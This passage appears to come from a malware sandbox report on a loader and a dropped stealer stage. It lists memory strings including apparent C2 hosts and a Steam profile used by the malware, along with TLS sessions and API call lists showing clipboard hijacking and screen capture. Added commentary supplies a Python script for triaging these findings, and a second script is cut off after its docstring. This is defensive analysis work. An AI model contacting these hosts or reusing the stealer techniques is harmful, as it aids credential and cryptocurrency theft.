                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api2o
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apio
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/i
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                Source: 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/Ds
                Source: AZCFTWko2q.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apims
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900_
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/2
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/pi
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49711 version: TLS 1.2
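The URL findings above mix two different things. Most of them are residue of the Steam profile page that the dropped stage fetched (steampowered.com, steamstatic.com, steamcommunity.com, plus reCAPTCHA, YouTube, Vimeo and similar hosts that read like fragments of that page's response headers). A handful are names with no such explanation: the .biz and .cyou hosts whose paths start with /api, all found only in 86DC.tmp.exe, and the post-to-me.com tracking URL with a country code found only in the loader AZCFTWko2q.exe. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses lines in the report's own format, separates the two groups with an allowlist of registrable domains (an assumption chosen for this report, not something the sandbox provides), and shows which hosts share a memory dump, because that co-location is itself evidence: the .cyou names sit in the same dumps as the Steam profile URL, while lv.queniujq.cn sits in the dump that holds the reCAPTCHA and YouTube hosts. SAMPLE_LINES is a constructed subset copied from the listing above.

```python
"""Triage of Joe Sandbox "String found in binary or memory" lines.

Added example, not code from the Joe Sandbox report: it parses URL findings
in the report's own line format, splits hosts into those the fetched Steam
profile page accounts for and those it does not, and shows which hosts share
a memory dump. SAMPLE_LINES is a constructed subset copied from the report."""
import re
from urllib.parse import urlsplit

SAMPLE_LINES = [
    "Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/",
    "Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/",
    "Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api",
    "Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api2o",
    "Source: 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api",
    "Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn",
    "Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE",
    "Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apims",
    "Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900",
    "Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/pi",
    "Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/",
    "Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49711 version: TLS 1.2",
]

# Registrable domains that the Steam profile page, its response headers and its
# embedded widgets explain. This allowlist is an assumption made for this
# report, not a list the sandbox provides; extend it when the fetched page differs.
EXPECTED_DOMAINS = frozenset({
    "steampowered.com", "steamstatic.com", "steamcommunity.com", "steam.tv",
    "valvesoftware.com", "google.com", "gstatic.com", "gstatic.cn",
    "recaptcha.net", "youtube.com", "ytimg.com", "vimeo.com", "medal.tv",
    "sketchfab.com", "akamaized.net", "eccdnx.com", "sf.net",
})

# The report's line format: "Source: <proc>, <dump>.sdmp[, <proc>, <dump>.sdmp ...]String found ...".
# The regexes also accept a " | " separator in case the line was cleaned up by hand.
PROC_RE = re.compile(r"^Source:\s*([^,|]+?)(?=,|\s*\|?\s*String found)")
DUMP_RE = re.compile(r"([^\s,]+),\s*(\d{8}\.\d{8}\.\d+\.[0-9A-Fa-f]{16})")
URL_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
TLS_RE = re.compile(r"HTTPS traffic detected:\s*([\d.]+):(\d+)\s*->\s*([\d.]+):(\d+)"
                    r"\s*version:\s*(\S+ \S+)")


def registrable(host):
    """Last two labels of a host name. A simplification (no public-suffix
    list) that is adequate for the hosts in this report."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def parse_strings(lines):
    """Yield (host, path, [(process, dump_id), ...]) per URL finding. A finding
    taken from the file on disk rather than a memory dump gets dump_id None."""
    for line in lines:
        url, proc = URL_RE.search(line), PROC_RE.match(line)
        if not (url and proc):
            continue
        parts = urlsplit(url.group(1))
        if not parts.netloc:
            continue
        origins = DUMP_RE.findall(line[: url.start()]) or [(proc.group(1), None)]
        yield parts.netloc.lower(), parts.path, origins


def triage(lines):
    """Return (expected, unexpected), each mapping host -> set of (process, path).
    Paths are kept because memory-scraped strings carry residue: '/api2o',
    '/apims' and '/pi' are the '/api' endpoint with adjacent bytes glued on
    or cut off, not three distinct endpoints."""
    expected, unexpected = {}, {}
    for host, path, origins in parse_strings(lines):
        bucket = expected if registrable(host) in EXPECTED_DOMAINS else unexpected
        for process, _ in origins:
            bucket.setdefault(host, set()).add((process, path))
    return expected, unexpected


def stage2_unexpected(lines):
    """Unexpected hosts seen in the dropped stage 86DC.tmp.exe, the process
    whose memory holds the stealer strings in this report."""
    _, unexpected = triage(lines)
    return sorted(host for host, seen in unexpected.items()
                  if any(process == "86DC.tmp.exe" for process, _ in seen))


def co_located(lines, host):
    """Other hosts found in the same memory dump(s) as host. A name that only
    ever sits next to reCAPTCHA/YouTube hosts probably came from the fetched
    page; one that sits next to the Steam profile URL and other .biz/.cyou
    names belongs with the C2 list."""
    dumps = {}
    for other, _, origins in parse_strings(lines):
        for _, dump in origins:
            if dump:
                dumps.setdefault(dump, set()).add(other)
    return set().union(*(hs for hs in dumps.values() if host in hs)) - {host}


def tls_sessions(lines):
    """(server_ip, client_port, version) for each TLS session the sandbox saw."""
    return [(m.group(1), int(m.group(4)), m.group(5))
            for m in map(TLS_RE.search, lines) if m]
```

Two caveats when reading the output. The sandbox records four TLS 1.2 sessions but no DNS answers in this part of the report, so the script cannot say which of the unexpected names each server IP belongs to; pair them from the DNS section of the report rather than by guesswork. And lv.queniujq.cn lands in the unexpected bucket only because it is not on the allowlist; its co-location with the Steam and reCAPTCHA hosts in dump 00000003.00000002.1760137243.0000000000944000 is the reason to check it against the fetched page before treating it as infrastructure.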
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024C1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
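The Code function lines list the Win32 calls the sandbox resolved inside one function, and the order of those calls is the signal. Function 0_2_004016DF in the loader, and its copy at 0_2_024C1942 inside the 0x24C0000 allocation, opens the clipboard, reads it, measures the text three times, empties the clipboard and writes new data before closing it: a read-then-replace sequence, which is the shape of clipboard hijacking rather than of a program that merely reads what the user copied (that reading is this editor's interpretation, not a statement in the report). Function 3_2_00431839 in the dropped stage is a plain GDI screen capture. The script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's format and checks each call list against ordered API patterns; the pattern names and what they are taken to mean are assumptions of this example, and SAMPLE_LINES is a constructed subset copied from the listing above.

```python
"""Triage of Joe Sandbox "Code function" lines by Win32 API call order.

Added example, not code from the Joe Sandbox report: it parses the call list
the sandbox attaches to a function and checks it against ordered API
patterns. The pattern names and what they are taken to mean are this
example's interpretation; SAMPLE_LINES is a constructed subset copied from
the report."""
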